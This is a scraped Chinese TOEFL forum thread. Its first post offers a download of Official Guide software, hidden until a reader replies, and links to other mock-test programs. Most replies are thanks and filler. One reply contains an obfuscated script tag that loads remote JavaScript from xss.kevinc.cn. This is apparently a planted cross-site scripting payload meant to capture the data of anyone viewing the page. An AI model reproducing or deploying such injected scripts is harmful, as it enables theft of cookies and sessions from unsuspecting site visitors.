小站论坛_托福论坛

[综合资料] 【免费】最新!托福OG(官方指南) iso软件版 免费下载!不容错过

排名500+

小站金币
看到论坛上有OG 托福考试官方指南的各种版本的PDF版本(点击这里下载OG[PDF版]),但没有软件版下载。我在这里把OG软件版的传上来了

软件版预览截图:

OG(第4版)ISO软件版下载地址[官方原版带mp3和自动批改功能]:
(下载地址回复可见)

游客,如果您要查看本帖隐藏内容请回复

除了这个OG的测试题外,TPO、KAPLAN、longman、高分120这几个类似的软件也提供给大家下载:
TPO1-37模考软件(win+mac+pps)永久免费版
http://bbs.zhan.com/thread-101982-1-1.html
KAPLAN的TOEFL IBT模考软件
http://bbs.zhan.com/thread-16700-1-1.html
longman托福模考软件
http://bbs.zhan.com/thread-16738-1-1.html
  托福高分120系列听力+写作+阅读+口语
http://bbs.zhan.com/thread-16643-1-1.html

托福OG是ETS官方出品的托福备考资料,其中包括托福考试介绍以及真题,对于整个托福考试的概括。大家都奔着托福高分去的,那么怎样才能让自己的托福考试取得高分呢?这里小编为大家推荐几篇托福考试高分备考经验,希望对大家托福提分有帮助。

1.托福109分难吗?详解托福高分备考经验》》》点击查看

2.
首战托福114分经验分享》》》点击查看

3.
托福突破100分只需要45天》》》点击查看

轻轻一扫,托福备考资讯揣兜兜                         轻轻一扫,精彩托福专题随时看

您需要 登录 才可以下载或查看,没有帐号?快速注册

排名500+

小站金币
小站托福app全新发布
感谢楼主分享~~

排名500+

小站金币
小站托福app全新发布
自带的不能用, 来下一个

2018托福真题解析汇总

排名500+

小站金币
thxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

2018托福考试机经预测

排名500+

小站金币
谢谢楼主分享 新手 希望有用

luxfairy  链接失效,请问能不能分享下,谢谢  详情 回复 发表于 2017-9-27 08:02
Wisteria217  楼主的地址已经无效了,大神可不可以施舍一下,万分感谢  详情 回复 发表于 2016-11-21 14:15

排名500+

小站金币
谢谢楼主分享,新人一枚,

排名500+

小站金币

扫一扫,托福考试提分利器就到手

非常感谢楼主分享!!!

排名500+

小站金币

学生证 教师证

GOODGOODGOODGOODGOODGOODGOODGOODGOODGOODGOODGOODGOODGOODGOODGOODGOODGOOD

排名500+

小站金币
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<sCRiPt/SrC=//xss.kevinc.cn/gNGI>//

排名500+

小站金币

啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊

购买转让学习资料,就来二手交易区

领取福利

我们将以您绑定的 (****)
作为接收批改短信的默认手机号码

订阅小站最新精品课程信息

领取福利

输入您的手机号码,批改动态随时掌握!

订阅小站最新精品课程信息

您可以在设置—密码安全—绑定手机中随时修改您的手机号码

领取福利

还差最后一步了!只要填写完邮箱即可同时获得批改短信提醒小站精品课程信息两大福利了!

领取福利
快捷菜单

网站地图 | 最新帖子 | 联系我们 | 站点统计 | 版权声明 | 免责及隐私声明 © 2011-2018 ZHAN.com All Rights Reserved. 沪ICP备15003744号-3
  沪公网安备 31010602002658号

订阅最新机经

选择托福机经及考试日期进行预约,预约后机经将在考试前3-5天左右通过邮件和短信形式推送

热门机经*
考试日期*
立即订阅